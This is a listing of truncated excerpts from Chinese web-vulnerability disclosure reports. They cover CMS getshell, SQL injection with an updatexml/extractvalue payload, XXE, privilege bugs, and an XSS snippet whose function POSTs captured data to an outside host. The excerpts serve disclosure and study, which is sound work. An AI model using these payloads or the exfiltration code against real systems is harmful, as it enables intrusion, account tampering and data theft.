上次发的那个官方已补,再来继续看看还可以不。
IIS6 or LINUX+APACHE
上回分解 请看这 WooYun: qibocms 新闻系统 Getshell (需结合解析漏洞)
http://bbs.qibosoft.com/down2.php?v=news1.0#down
下载地址 刚下的。
来看看官方是怎么修复的
在news/inc/artic_function.php中
function get_o...
天格科技某处越权漏洞可修改任意账户资料
问题存在于天格科技的苹果客户端。安卓下目测存在同样的问题。
下载方式位于http://mobile.9158.com/ 或直接91助手搜索9158
进入客户端,注册帐号。我们点击个人资料
我们看下数据包
发现了用户ID的参数,而在首页,我发现了9158公司VIP销售...
打了最新的补丁
绕过方法:
updatexml函数
extractvalue函数
url:
http://localhost/ecmall/index.php?app=my_shipping&act=edit&shipping_id=1
payload1:
shipping_name=li&shipping_desc=asd&irst_price=10&step_price=0&enabled=1&sort_order=255&am...
起了一个坏头,潜在影响包括最新版discuzx3.2等
从官方下了最新的微信开放平台接入示例文件(php)
http://mp.weixin.qq.com/mpres/htmledition/res/wx_sample.zip
wx_sample.php行27
$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
//extract post data
if (!empty($postStr)){
...
接口缺少过滤可以任意编辑他人帖子/任意编辑超过7天限制的帖子
问题接口:/post.php
POST /post.php HTTP/1.1
Host: wangpai.2345.cn
Proxy-Connection: keep-alive
Content-Length: 193
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36...
在吐槽处插入XSS代码
function up_data(data)
{
var up_result;
var data=encodeURIComponent(data);
var mlhttp=new XMLHttpRequest();
mlhttp.onreadystatechange=function()
{
if(mlhttp.readyState==4)
{
up_result=mlhttp.responseText;
}
}
mlhttp.open("POST","http://www...
Tipask问答系统是一款开放源码的PHP仿百度知道程序。以国人的使用习惯为设计理念,采用MVC构架,系统具有速度快,SEO友好,界面操作简洁明快等特点。天极网、戴尔中国、WPS office等大型网站均采用了该系统。
Tipask问答系统在对用户提问的时候允许上传附件类型存在安全隐患:
文件 /control/attach.php
...
IBM最近发布了两个影响DB2的linux、unix、windows三个版本的安全漏洞补丁。
而本文将探讨其中这两发漏洞(CVE-2014-0907和CVE-2013-6744)的一些技术细节,从而帮助数据库管理员评估自身数据库环境的风险以及帮助管理员设计一个更加合理安全的解决方案。
第一发:(CVE-2014-0907)DB2执行提权漏洞
如果你...
有同学问,用百度搜索了下,发现国内相关介绍基本是没有,就写篇文章来介绍下。不过看到有现成的介绍,就拿来翻译修改下。 本文的内容主要翻译来自该文章,把一些没必要的话给删了,做了一些整理修改,然后补充一些案例。
http://www.acunetix.com/blog/web-security-zone/universal-cross-site-scr...
下面了一发不用csrf以及xss的。全版本。可以配合上一个漏洞,进行getshell。 之前的漏洞也是所有版本的,不只是免费版(包括付费的政务版等等)
还是先说免费版的。本地测试。
我们先登录上去,会生成如下的cookies
PO_auth=MQk5ZjFmNDhmZTgyMGM2OTU0NzBhMGY1M2E5ODI4ZmY5Nw==
...